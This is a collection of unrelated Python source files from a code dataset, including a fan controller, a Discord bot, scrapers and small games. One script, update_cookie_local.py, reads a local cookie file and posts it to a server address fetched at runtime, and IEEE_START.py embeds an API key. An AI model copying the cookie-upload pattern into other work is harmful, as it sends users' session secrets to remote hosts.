adgcreator.build_adg([file_list, volume_list],\n                             lump['namer'],\n                             workpaths['adg_path'],\n                             marker_list)\n        pmsg(\"Finished!\")\n        print(\"Your project, \\\"%s\\\", can be found in the \\'output\\' folder.\" % lump['namer'])\n        pmsg(\"\")\n        pmsg(\"Happy Ableton-ing!\")\n        pmsg(\"\")\n    else:\n        print(\"Thanks for trying - maybe next time...\")\n        killit(2)\n\n\nif __name__ == '__main__':\n    handle(sys.argv[1:])\n","sub_path":"livewaveslicer.py","file_name":"livewaveslicer.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"126359745","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom RPi import GPIO\nfrom time import sleep\nimport sys\n\n# A GPIO pin number that connected with a fan controller\nFAN_GPIO = 18  # BCM number\n\n#\nPWM_FREQ = 25  # [Hz] Change this value if fan has strange behavior\n\n# A time period of monitoring the SoC temperature\nINTERVAL = 2  # in seconds (greater than 0)\n\n# Uses this load value when the SoC temperature is less than minimum working temperature\nIDLE_LOAD = 0\n\n# Each step must be a tuple that have temperature and fans load ratio\n# The tempratures unit is in celcius degrees. (0~100)\n# The fans load ratios unit is in percentage. (0~100)\nTEMP_LOAD_STEPS = [\n    (55, 40),\n    (58, 50),\n    (60, 80),\n    (63, 100)\n]\n\n# Fan speed will change only of the difference of temperature is higher than hysteresis\nIDLE_HYST = 1\n\n# Validate steps\nif len(TEMP_LOAD_STEPS) < 1:\n    sys.stderr.write(\"There is no given steps.\\n\")\n    exit(1)\nfor step_idx, (step_temp, step_load) in enumerate(TEMP_LOAD_STEPS):\n    if not 0 <= step_temp <= 100:\n        sys.stderr.write(\"The temperature value in the step %s is not between 0 and 100.\\n\" % step_idx)\n        exit(1)\n    if not 0 <= step_load <= 100:\n        sys.stderr.write(\"The load value in the step %s is not between 0 and 100.\\n\" % step_idx)\n        exit(1)\n    if step_idx > 0:\n        prev_step_temp, prev_step_load = TEMP_LOAD_STEPS[step_idx-1]\n        if step_temp < prev_step_temp:\n            sys.stderr.write(\"The temperature value in the step %s is smaller than previous steps one.\\n\" % step_idx)\n            exit(1)\n        if step_load < prev_step_load:\n            sys.stderr.write(\"The load value in the step %s is smaller than previous steps one.\\n\" % step_idx)\n            exit(1)\n\n# Setup GPIO pin\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(FAN_GPIO, GPIO.OUT)\nfan = GPIO.PWM(FAN_GPIO, PWM_FREQ)\nfan.start(100)\nis_idle = False\n\n# Start loop\ntry:\n    while True:\n        # Wait until next refresh\n        sleep(INTERVAL)\n\n        # Read CPU temperature\n        with open(\"/sys/class/thermal/thermal_zone0/temp\", \"r\") as file:\n            temp = float(file.read()) / 1000\n\n        min_temp, min_load = TEMP_LOAD_STEPS[0]\n        if temp < min_temp:\n            if not is_idle:\n                if temp >= min_temp - IDLE_HYST:\n                    fan.ChangeDutyCycle(min_load)\n                    continue\n                else:\n                    is_idle = True\n                    fan.ChangeDutyCycle(IDLE_LOAD)\n        else:\n            if is_idle:\n                if temp < min_temp + IDLE_HYST:\n                    continue\n                else:\n                    is_idle = False\n            # load = min_load\n            load = min_load\n            for step_idx, (step_temp, step_load) in enumerate(TEMP_LOAD_STEPS):\n                if step_idx == 0:\n                    continue\n                prev_temp, prev_load = TEMP_LOAD_STEPS[step_idx-1]\n                if prev_temp <= temp < step_temp:\n                    percentage = (temp - prev_temp) / (step_temp - prev_temp)\n                    load = prev_load + percentage * (step_load - prev_load)\n                    # print(\"pt:%s pl:%s st:%s sl:%s P:%s\"% (prev_temp, prev_load, step_temp, step_load, percentage))\n                    break\n                elif temp >= step_temp and step_idx + 1 == len(TEMP_LOAD_STEPS):\n                    load = step_load\n            fan.ChangeDutyCycle(load)\n            #print(\"T:%s L:%s\" % (temp, load))\n\n# On keyboard interrupt occurs\nexcept KeyboardInterrupt:\n    fan.stop()\n    GPIO.cleanup()\n    exit()\n","sub_path":"pwm_fan_ctrl.py","file_name":"pwm_fan_ctrl.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"11425798","text":"\"\"\"\nCreated on Nov 3, 2016\n\n@author: jvazquez\n\"\"\"\nimport logging\n\nimport redis\n\nfrom tenant.listener.alchemy import session, Tenant\nfrom tenant.listener.extensions import configurator\nfrom tenant.listener.tenant import TenantListener\nfrom tenant.listener.alchemy import DatabaseFactory\nlogger = logging.getLogger(__name__)\n\n\ndef setup_redis():\n    \"\"\"Setup the redis database connection\n    \"\"\"\n\n    redis_host = configurator.get(\"cache\", \"redis_host\")\n    redis_port = configurator.get(\"cache\", \"redis_port\")\n    redis_db = configurator.get(\"cache\", \"redis_db\")\n    redis_connection = redis.StrictRedis(host=redis_host, port=redis_port,\n                                         db=redis_db)\n    return redis_connection\n\n\ndef push():\n    tenant_listener = TenantListener()\n    redis_client = setup_redis()\n    ids = []\n    for tenant in session.query(Tenant).all():\n        structure = tenant_listener.obtain_microservices_structure(tenant.id)\n        ids.append(tenant.id)\n        for service in structure[\"microservices\"]:\n            protocol = service[\"protocol\"]\n            name = service[\"service_name\"]\n            if protocol == \"postgresql+psycopg2\":\n                data = DatabaseFactory.build_alchemy_url(service)\n            elif protocol == \"mongo\":\n                data = service[\"dbname\"]\n            logger.info(\"{} {} {}\".format(tenant.id, name, data))\n            exists = redis_client.hget(tenant.id, name)\n            if exists:\n                logger.info(\"Deleting name: {}\".format(name))\n                redis_client.hdel(tenant.id, name)\n            redis_client.hset(tenant.id, name, data)\n    logger.info(\"All connections pushed\")\n    # setup = list(map(lambda tenant_id: redis_client.hgetall(tenant_id), ids))\n","sub_path":"tenant/listener/connections.py","file_name":"connections.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"263707967","text":"import os\nimport asyncpg\n\nimport discord\nfrom discord.ext import commands\n\nclass HowLong(commands.Bot):\n    def __init__(self):\n        self.INITIALS = [\"jishaku\", \"cogs.events\", \"cogs.owner\", \"cogs.misc\"]\n        super().__init__(command_prefix=\"how long \", case_insensitive=True)\n        self.db = self.loop.run_until_complete(asyncpg.create_pool(database=\"howlong\", user=\"postgres\", password=os.environ.get(\"PG_PASSWORD\")))\n    \n    async def on_ready(self):\n        self.remove_command(\"help\")\n        for cog in self.INITIALS:\n            try:\n                self.load_extension(cog)\n                print(cog)\n            except Exception as error:\n                raise error\n                continue\n\nif __name__ == \"__main__\":\n    HowLong().run(os.environ.get(\"TOKEN\"), reconnect=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"173587116","text":"from login import thunder_login\nimport requests\n\nif __name__ == '__main__':\n\tthunder_login()\n\tprint('Enter auth_key:')\n\tauth_key = raw_input()\n\trequest_result = requests.get('https://raw.githubusercontent.com/Chion82/Chion82.github.io/master/server_host')\n\thost = request_result.text.replace('\\n','')\n\tresult = requests.post(host + '/api/update_cookie.do', data={\n\t\t'auth_key':auth_key, \n\t\t'cookie': str(open('cookie.txt', 'r').read())\n\t\t})\n\tprint(result.text)\n","sub_path":"web/update_cookie_local.py","file_name":"update_cookie_local.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"235614399","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 00:09:18 2020\n\n@author: johnoyegbite\n\"\"\"\n# SOLVED!\n\"\"\"\nProblem:\n    Given a string, sort it in decreasing order based on the frequency of\n    characters.\n\nExample 1:\n    Input:\n    \"tree\"\n    Output:\n    \"eert\"\n    Explanation:\n    'e' appears twice while 'r' and 't' both appear once.\n    So 'e' must appear before both 'r' and 't'. Therefore \"eetr\" is also\n    a valid answer.\n\nExample 2:\n    Input:\n    \"cccaaa\"\n    Output:\n    \"cccaaa\"\n    Explanation:\n    Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid\n    answer.\n    Note that \"cacaca\" is incorrect, as the same characters must be\n    together.\n\nExample 3:\n    Input:\n    \"Aabb\"\n    Output:\n    \"bbAa\"\n    Explanation:\n    \"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\n    Note that 'A' and 'a' are treated as two different characters.\n\"\"\"\n\n\ndef sort_from_best(best, char_freq, sorted_s):\n    for char in char_freq:\n        if char_freq[char] == best:\n            sorted_s.append(best*char)\n\n\ndef frequencySort(s):\n    \"\"\"\n    :type s: str\n    :rtype: str\n    \"\"\"\n    char_freq = {}\n\n    for char in s:\n        char_freq[char] = char_freq.get(char, 0) + 1\n\n    sorted_s = []\n\n    decreasing_best = sorted(list(set(char_freq.values())), reverse=True)\n\n    for best in decreasing_best:\n        sort_from_best(best, char_freq, sorted_s)\n\n    return ''.join(sorted_s)\n\n\nif __name__ == \"__main__\":\n    s = \"eert\"\n    print(frequencySort(s))\n","sub_path":"sort-characters-by-freq.py","file_name":"sort-characters-by-freq.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"375455790","text":"import ieee_xplore\nimport downloadPDF\nimport json\n\ndef main():\n    #query = 'software testing'\n    query = list()\n    api_key = 'xxbuhzj7q5zfednrb9j49yzq'\n    # keyword = input(\"What key words do you want to search: \")\n    # query.append(keyword)\n    # author = input(\"Who is the author you are looking for: \")\n    # query.append(author)\n    # path = input(\"Please input download path:\")\n    with open('IEEE', 'r') as f:\n        f_dict = json.load(f)\n        for key in f_dict:\n            if key == 'file':\n                path = f_dict[key]\n                continue\n            if f_dict[key] != '':\n                query.append(str(f_dict[key]).replace(\" \",\"_\"))\n\n    ieee_retrieve = ieee_xplore.IEEEXploreRetrieve(query, api_key, maximum_results=1000)\n    bibtex_database, lists, count = ieee_retrieve.pull()\n    print(\"Number of eligible documents:\"+ str(count))\n    downloader = downloadPDF.DownloadPDF(lists, count, path)\n    downloader.download()\n    print(bibtex_database)\n\nif __name__ == '__main__':\n    main()","sub_path":"slr/slirm/retrievers/IEEE_START.py","file_name":"IEEE_START.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"654081897","text":"import c\nimport pygame\nimport time\nimport random\n\n#load all object sprite\nstar \t= [3,3]\ng_1\t\t= pygame.image.load(\"images/g1.png\")\ng_2\t\t= pygame.image.load(\"images/g2.png\")\ng_3\t\t= pygame.image.load(\"images/g3.png\")\ng_4\t\t= pygame.image.load(\"images/g4.png\")\ng_all\t= [g_1,g_2,g_3,g_4]\ny \t\t= -10\nx \t\t= random.randrange(0, c.G_WIDTH)\ngall \t= random.choice(g_all)\nclass Star(pygame.sprite.Sprite):\n\tdef __init__(self, color, pos):\n\t\t#Calling sprite class.\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\t#Creates a square.\n\t\tself.image = pygame.Surface(star)\n\t\t#fill the square\n\t\tself.image.fill(color)\n\t\t#Arrange postion.\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = pos\n\n\tdef update(self , speed):\n\t\tself.rect.x += 0\n\t\tself.rect.y += 1 + speed\n\t\tif self.rect.y > c.G_HEIGHT:\n\t\t\tself.rect.y = 0\n\t\t\tself.rect.x = random.randrange(0, c.G_WIDTH)\n\ndef gal(fast):\n\tglobal x, y, gall\n\ty += fast\n\tc.display.blit(gall,(x,y))\t\n\tif y > c.G_HEIGHT:\n\t\ty = -1800\n\t\tx = random.randrange(0, c.G_WIDTH)\n\t\tgall = random.choice(g_all)\n\t\n\n\ndef move(amount, obj):\n\tfor i in range(amount):\n\t\ttemp_x = random.randrange(0, c.G_WIDTH)\n\t\ttemp_y = random.randrange(0, c.G_HEIGHT)\n\t\tobj.add(Star(random.choice(c.s_colors),[temp_x,temp_y]))\n\n","sub_path":"hadron/obj.py","file_name":"obj.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"312674710","text":"import time\nimport psutil\nimport os\n\nMODEL_FILE_PATH = 'models/model.pickle'\n\n# Benchmark\nexecution_start_time = time.time()\n\n# Process features\nfrom features_processor import load_data\nfeatures, labels = load_data('test')\n\n# Load model from file\nimport pickle\nfile = open(MODEL_FILE_PATH, 'rb')\nclf = pickle.load(file)\nfile.close()\n\n# Test model\nprint(\"Predicting test data ... 
\")\nstart_time = time.time()\n\n# Predict test data and calculate accuracy score\nfrom sklearn.metrics import accuracy_score\nprediction = clf.predict(features)\naccuracy = accuracy_score(labels, prediction)\n\nprint(\"DONE (%.3fs)\" % (time.time() - start_time))\n\nprint(\"***\")\nprint(\"Test Accuracy: %.5f\" % accuracy)\nprint(\"RAM CONSUMED: %.3f megabytes\" % (psutil.Process(os.getpid()).memory_info().rss/1024/1024))\nprint(\"TOTAL EXECUTION TIME: %.3f seconds\" % (time.time() - execution_start_time))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"579144087","text":"import sys\nfrom functools import partial\n\nimport dolfin as fem\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as sym\n\nfrom buildup import common, utilities\nfrom mtnlion.newman import equations\n\n\n# NOTE: Deprecated\ndef picard_solver(a, lin, estimated, previous, bc, phis, phie):\n eps = 1.0\n eps_1 = 1.0\n tol = 1e-5\n iter = 0\n maxiter = 25\n while eps > tol and iter < maxiter:\n fem.solve(a == lin, estimated, bc)\n\n # calculate norm\n diff = estimated.vector().get_local() - previous.vector().get_local()\n eps = np.linalg.norm(diff, ord=np.Inf)\n\n print(\"iter={}, norm={}\".format(iter, eps))\n\n if iter > 1 and eps > eps_1:\n print(\"Solution diverging, reverting and stopping.\")\n estimated.assign(previous)\n break\n\n # update j\n phis.assign(estimated.split(True)[0])\n # phie.assign(estimated.split(True)[1])\n\n # set previous solution\n previous.assign(estimated)\n eps_1 = eps\n iter += 1\n\n\ndef main():\n # Times at which to run solver\n time_in = [0.1, 5, 9.9, 10, 10.1, 15, 20]\n\n dt = 0.1\n time = [None] * (len(time_in) * 2)\n time[::2] = [t - dt for t in time_in]\n time[1::2] = time_in\n\n I_1C = 20.5\n Iapp = [I_1C if 10 <= i <= 20 else -I_1C if 30 <= i <= 40 else 0 for i in time]\n\n # Collect common data\n cmn = common.Common(time)\n domain = cmn.domain\n comsol = cmn.comsol_solution\n Acell = cmn.fenics_consts.Acell\n\n x = sym.Symbol(\"ce\")\n y = sym.Symbol(\"x\")\n kp = cmn.fenics_consts.kappa_ref.subs(y, x)\n\n dfdc = sym.Symbol(\"dfdc\")\n # dfdc = 0\n kd = (\n fem.Constant(2)\n * cmn.fenics_consts.R\n * cmn.fenics_consts.Tref\n / cmn.fenics_consts.F\n * (fem.Constant(1) + dfdc)\n * (cmn.fenics_consts.t_plus - fem.Constant(1))\n )\n kappa_D = fem.Expression(sym.printing.ccode(kd), dfdc=0, degree=1)\n\n P = fem.FiniteElement(\"CG\", cmn.mesh.ufl_cell(), degree=1)\n element = fem.MixedElement([P, P, P, P])\n V = fem.FunctionSpace(cmn.mesh, element)\n V_ = [V.sub(i).collapse() for i in range(4)]\n\n v = fem.TestFunction(V)\n v_phis, v_phie, v_ce, v_cse = fem.split(v)\n u = fem.TrialFunction(V)\n u_phis, u_phie, u_ce, u_cse = fem.split(u)\n bc = [fem.DirichletBC(V.sub(0), 0.0, domain.boundary_markers, 1), 0, 0]\n\n # true solutions\n true = fem.Function(V)\n\n # fenics solutions\n estimated = fem.Function(V)\n\n phis_f = fem.Function(domain.V)\n phie_f = fem.Function(domain.V)\n ce_f = fem.Function(domain.V) # \"previous solution\"\n cse_f = fem.Function(domain.V)\n\n Uocp = equations.Uocp(cse_f, **cmn.fenics_params)\n j = equations.j(\n ce_f, cse_f, phie_f, phis_f, Uocp, **cmn.fenics_params, **cmn.fenics_consts, dm=domain.domain_markers\n )\n phis_form = partial(\n equations.phis, j, u_phis, v_phis, domain.dx((0, 2)), **cmn.fenics_params, **cmn.fenics_consts, ds=domain.ds(4)\n )\n phie_form = partial(equations.phie, j, ce_f, u_phie, 
v_phie, domain.dx, **cmn.fenics_params, **cmn.fenics_consts)\n\n    # initialize matrix to save solution results\n    phis_array = np.empty((len(time_in), len(comsol.mesh)))\n    phie_array = np.empty((len(time_in), len(comsol.mesh)))\n    j_array = np.empty((len(time_in), len(comsol.mesh)))\n\n    dx = domain.dx\n    assigner = fem.FunctionAssigner(V, [domain.V] * 4)\n    assigner.assign(estimated, [phis_f, phie_f, ce_f, cse_f])\n\n    k = 0\n    for i in range(len(time_in)):\n        i_1 = i * 2  # previous time step\n        i = i * 2 + 1  # current time step\n        cse_f.vector()[:] = comsol.data.cse[i][fem.dof_to_vertex_map(V_[0])].astype(\"double\")\n        ce_f.vector()[:] = comsol.data.ce[i][fem.dof_to_vertex_map(V_[1])].astype(\"double\")\n        phie_f.vector()[:] = comsol.data.phie[i][fem.dof_to_vertex_map(V_[2])].astype(\"double\")\n        phis_f.vector()[:] = comsol.data.phis[i_1][fem.dof_to_vertex_map(domain.V)].astype(\"double\")\n\n        bc[1] = fem.DirichletBC(V.sub(0), comsol.data.phis[i][-1], domain.boundary_markers, 4)\n        bc[2] = fem.DirichletBC(V.sub(1), comsol.data.phie[i, 0], domain.boundary_markers, 1)\n\n        kappa_ref = fem.Expression(sym.printing.ccode(kp), ce=ce_f, degree=1)\n        kappa_eff = kappa_ref * cmn.fenics_params.eps_e ** cmn.fenics_params.brug_kappa\n        kappa_Deff = kappa_D * kappa_ref * cmn.fenics_params.eps_e\n\n        Feq = (\n            phis_form(neumann=fem.Constant(Iapp[i]) / Acell)\n            + phie_form(kappa_eff=kappa_eff, kappa_Deff=kappa_Deff)\n            + fem.inner(u_ce, v_ce) * dx\n            + fem.inner(u_cse, v_cse) * dx\n            + fem.inner(u_phis, v_phis) * dx(1)\n        )\n\n        a = fem.lhs(Feq)\n        lin = fem.rhs(Feq)\n\n        picard_solver(a, lin, estimated, true, bc, phis_f, phie_f)\n\n        phis_array[k, :] = estimated.split(True)[0].vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n        phie_array[k, :] = estimated.split(True)[1].vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n        j_array[k, :] = fem.interpolate(j, V_[0]).vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n        k += 1\n\n    # x, ce, cse, phie, phis, csmax, ce0, alpha, k_norm_ref, F, R, Tref, Uocp_neg, Uocp_pos\n    d = dict()\n    d[\"x\"] = comsol.mesh\n    d[\"ce\"] = comsol.data.ce[1::2]\n    d[\"cse\"] = comsol.data.cse[1::2]\n    d[\"phie\"] = comsol.data.phie[1::2]\n    d[\"phis\"] = phis_array\n\n    neg_params = {k: v[0] if isinstance(v, np.ndarray) else v for k, v in cmn.params.items()}\n    d = dict(d, **neg_params)\n\n    def filter(x, sel=\"neg\"):\n        if sel == \"neg\":  # compare string values with ==, not identity\n            ind0 = 0\n            ind1 = cmn.comsol_solution.neg_ind\n        else:\n            ind0 = 2\n            ind1 = cmn.comsol_solution.pos_ind\n\n        if isinstance(x, list):\n            return x[ind0]\n\n        if isinstance(x, np.ndarray):\n            if len(x.shape) > 1:\n                return x[:, ind1]\n\n            return x[ind1]\n\n        return x\n\n    neg = dict(map(lambda x: (x[0], filter(x[1], \"neg\")), d.items()))\n    dta = equations.eval_j(**neg, **cmn.consts)\n\n    utilities.report(\n        comsol.neg, time_in, phis_array[:, comsol.neg_ind], comsol.data.phis[:, comsol.neg_ind][1::2], \"$\\Phi_s^{neg}$\"\n    )\n    plt.show()\n    utilities.report(\n        comsol.pos, time_in, phis_array[:, comsol.pos_ind], comsol.data.phis[:, comsol.pos_ind][1::2], \"$\\Phi_s^{pos}$\"\n    )\n    plt.show()\n\n    utilities.report(comsol.mesh, time_in, phie_array, comsol.data.phie[1::2], \"$\\Phi_e$\")\n    plt.show()\n    utilities.report(comsol.neg, time_in, dta, comsol.data.j[:, comsol.neg_ind][1::2], \"$j^{neg}$\")\n    plt.show()\n    utilities.report(\n        comsol.pos, time_in, j_array[:, comsol.pos_ind], comsol.data.j[:, comsol.pos_ind][1::2], \"$j^{pos}$\"\n    )\n    plt.show()\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    
sys.exit(main())\n","sub_path":"buildup/fenics_/phase2/coupled.py","file_name":"coupled.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"110656995","text":"# #######################################################\r\n# create the systems in 3D,\r\n# create the wall systems\r\n#\r\n# author: giric goyal\r\n# #######################################################\r\n\r\n# -------------------------------------------------------\r\n# imports \r\nfrom util import *\r\nfrom math import *\r\nfrom euclid import *\r\nfrom omega import *\r\nfrom cyclops import *\r\nfrom cameraManager import *\r\nfrom caveutil import *\r\n\r\n\r\n\r\n# -------------------------------------------------------\r\n# variables\r\n\r\ninfoWindowContainer = None\r\n\r\n# -------------------------------------------------------\r\n# method definitions\r\ndef createVisualization():\r\n\ttheSystem = dict()\r\n\t\r\n\tfor system in systemList:\r\n\t\t# set the system name\r\n\t\t# create the objects\r\n\t\ttheSystem = allSystemsOrbital[system]\r\n\t\tpos = starLocations[system].pos * orbitScaleFactor * userScaleFactor * 0.000000001\r\n\t\tfor name, model in theSystem.iteritems():\r\n\t\t\tif theSystem[name].isStar == 1:\r\n\t\t\t\tdot = StaticObject.create(\"defaultSphere\")\r\n\t\t\t\tdot.setPosition(pos)\r\n\t\t\t\tdot.setScale(Vector3(10.0/70, 10.0/70, 10.0/70))\r\n\t\t\t\t\r\n\t\t\t\tif name == \"The Sun\":\r\n\t\t\t\t\tdot.setEffect(\"colored -e red\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tif findInList(system, getDisplayList()) == True:\r\n\t\t\t\t\t\tdot.setEffect(\"colored -e #EEEE00CC\")\r\n\t\t\t\t\t\t#dot.setEffect(\"textured -v emissive -d \" + theSystem[name].texture)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#dot.setEffect(\"textured -v emissive -d \" + theSystem[name].texture)\r\n\t\t\t\t\t\tdot.setEffect(\"colored -e white\")\r\n\t\t\t\tvizContainer.addChild(dot)\r\n\t\t\t\r\n\t\t\t\tvisualizeDict[system] = dot\r\n\t\t\t\t\r\n\t\t\t\tt1 = Text3D.create('fonts/verdana.ttf', 1, str(name))\r\n\t\t\t\tt1.setPosition(Vector3(pos.x, pos.y, pos.z))\r\n\t\t\t\tt1.yaw(pi)\r\n\t\t\t\tt1.setFontResolution(256)\r\n\t\t\t\tt1.setFontSize(fontSize)\r\n\t\t\t\tt1.getMaterial().setTransparent(False)\r\n\t\t\t\tt1.getMaterial().setDepthTestEnabled(False)\r\n\t\t\t\tt1.setColor(colorWhite)\r\n\t\t\t\torientObjects.append(t1)\r\n\t\t\t\tvizContainer.addChild(t1)\r\n\t\t\t\tvisualizeTextDict[system] = t1\r\n\t\r\n\t\r\n\tvizContainer.setPosition(vizPos * overallScaleFactor)\r\n\t\r\n\t\r\n\t\r\ndef changeColor():\r\n\tactiveSystem = getActiveSystem()\r\n\tfor system, model in visualizeDict.iteritems():\r\n\t\t#visualizeDict[system].setEffect(\"colored -e white\")\r\n\t\tif system == activeSystem:\r\n\t\t\tvisualizeDict[system].setEffect(\"colored -e red\")\r\n\t\telse:\r\n\t\t\tif findInList(system, getDisplayList()) == True:\r\n\t\t\t\tvisualizeDict[system].setEffect(\"colored -e #EEEE00FF\")\r\n\t\t\t\t#visualizeDict[system].setEffect(\"textured -v emissive -d \" + visualizeDict[system].texture)\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tvisualizeDict[system].setEffect(\"colored -e white\")\r\n\t\t\t\t#visualizeDict[system].setEffect(\"textured -v emissive -d \" + visualizeDict[system].texture)\r\n\t\t\t\tpass\r\n\t\t\r\n\t\t\r\n\r\n\t","sub_path":"Project2/src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"33839738","text":"#!/usr/bin/env python3\n\n# this program searches the current working directory (and subdirectories) for all filenames with American style dates and renames them to filenames with\n# European style dates\n\n# To test this, generate a bunch of files using the ch9_project_rename_File_Generator.py script\n\nimport os, re, sys, shutil\n\n\nRegExAmerican = re.compile(r\"\"\" \n (\\d{2}) #Month\n -\n (\\d{2}) #Day\n -\n (\\d{4}) #Year\n \"\"\", re.VERBOSE)\n\nif not len(sys.argv) == 2: \n print('Usage: python3.5 ch9_project_rename_dates.py \\nPlease retry with only one argument.')\n sys.exit()\n\nos.chdir(sys.argv[1])\n# for i in range(len(sys.argv)): #debug\n# print(sys.argv[i])\n\n\n# pull the list of files from the directory by either os.listdir() or an os.walk()\n\nfor folder, subdirs, files in os.walk(os.getcwd()):\n for f in files:\n # print(f) #debug\n #@@ do the regex match here\n if RegExAmerican.search(f): #require at least 1 match\n # print('if RegExAmerican.search(f) statement evaluated True') #debug\n mo = RegExAmerican.sub(r'\\2-\\1-\\3', f)\n # print(mo) #debug\n shutil.move(os.path.join(folder, f), os.path.join(folder, mo)) #Renames the file","sub_path":"2017_Summer/ch9_project_rename_dates.py","file_name":"ch9_project_rename_dates.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"177661176","text":"import cv2\nimport numpy as np\nfrom openvino.inference_engine import IECore,IENetwork\nimport matplotlib.pyplot as plt\n\nmodel_xml='open_model_zoo-master/tools/downloader/intel/text-recognition-0012/FP32/text-recognition-0012.xml'\nmodel_bin='open_model_zoo-master/tools/downloader/intel/text-recognition-0012/FP32/text-recognition-0012.bin'\nie = IECore()\n\nnet = ie.read_network(model=model_xml, weights=model_bin)\nex_net = ie.load_network(net,\"CPU\")\n\nimg = cv2.imread(\"text_recognition/0000_0.jpg\",cv2.IMREAD_GRAYSCALE)\n\ndataptr = net.input_info[\"Placeholder\"].input_data\n\nn, c, h, w = dataptr.shape\n\nalpha = 0.8 # コントラスト項目\nbeta = 20 # 明るさ項目\n\n# 明るさ・コントラスト操作\nres_img = cv2.convertScaleAbs(img, alpha=alpha, beta=beta)\n\nin_frame = cv2.resize(res_img, (w, h))\ninput_frame = in_frame.reshape((n, c, h, w))\n\nplt.imshow(in_frame.squeeze())\nplt.show()\n\nout = ex_net.infer({\"Placeholder\":input_frame})\nrecog = list(out.values()).pop().squeeze()\nrecog = np.argmax(recog,axis=1)\nprint(recog)\n\nchars = \"0123456789abcdefghijklmnopqrstuvwxyz#\"\nls = []\nfor i in chars:\n ls.append(i)\nchars = np.array(ls)\n\nstring = \"\"\nfor i in chars[recog]:\n if i!=\"#\":\n string += i\nprint(string)\n","sub_path":"text_recgnition_test.py","file_name":"text_recgnition_test.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252146623","text":"from menu_parsing import menu_extract\nfrom page_parsing import process_page\nimport logging\nimport pandas as pd\n\nlink = \"https://tiki.vn/\"\nall_data = []\nall_category = menu_extract(link)\n\nfor link in all_category:\n for i in range(1,5,1):\n print(logging.error(\"processing page: %s\", i))\n data_df = (process_page(link, str(i)))\n category_link = link.split('/')[3]\n for data in data_df:\n all_data.append(tuple([data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9\n ]]))\n \n df = pd.DataFrame(all_data)\n 
df.to_csv(\"C:\\\\Users\\\\longbv1\\\\Desktop\\\\Tiki_Scapper\\\\raw\\\\tiki-\"+category_link+\".csv\", header=False, encoding=\"utf-8-sig\", index=False)\n\n","sub_path":"parsing/main_build.py","file_name":"main_build.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"474128428","text":"#! /usr/bin/python2.7\n# -*- coding: utf-8 -*-\n#\n# imageviewer.py\n#\n# Макет для вывода изображений с сервера.\n#\n# Апрель, 2016\n# Луганск\n# Автор сценария: Иванов Юрий aka HeaTTheatR\n#\n# Email: gorodage@gmail.com\n#\n\nimport os\n\ntry:\n from kivy.uix.widget import Widget\n from kivy.uix.boxlayout import BoxLayout\n from kivy.uix.button import Button\n from kivy.uix.popup import Popup\n from kivy.uix.image import Image\n from kivy.clock import Clock\n from kivy.core.window import Window\n from kivy.properties import ObjectProperty, ListProperty, StringProperty\n\n from progressload import ProgressLoad\n try:\n from Libs.server.retrieveprogressload import retrieve_progress_load\n except ImportError:\n import sys\n\n sys.path.insert(\n 0, os.path.split(os.path.abspath(sys.argv[0]))[0].split(\"/uix\")[0])\n\n from server.retrieveprogressload import retrieve_progress_load\nexcept Exception as text_error:\n import traceback\n open(\"/home/zavulon/sdssd.txt\", \"w\").write(str(sys.path))\n raise text_error\n\n\n__version__ = \"0.0.1\"\n\n\ndef p(*args):\n pass\n\n\nclass SettingSpacer(Widget):\n pass\n\n\nclass ImageViewer(BoxLayout):\n dismiss_callback = ObjectProperty(p)\n answer_callback = ObjectProperty(p)\n title_align = StringProperty(\"left\")\n title = StringProperty(\"Image\")\n background_image = StringProperty(\"atlas://data/images/defaulttheme/\"\n \"modalview-background\")\n size_hint = ListProperty([1, 1])\n auto_dismiss = 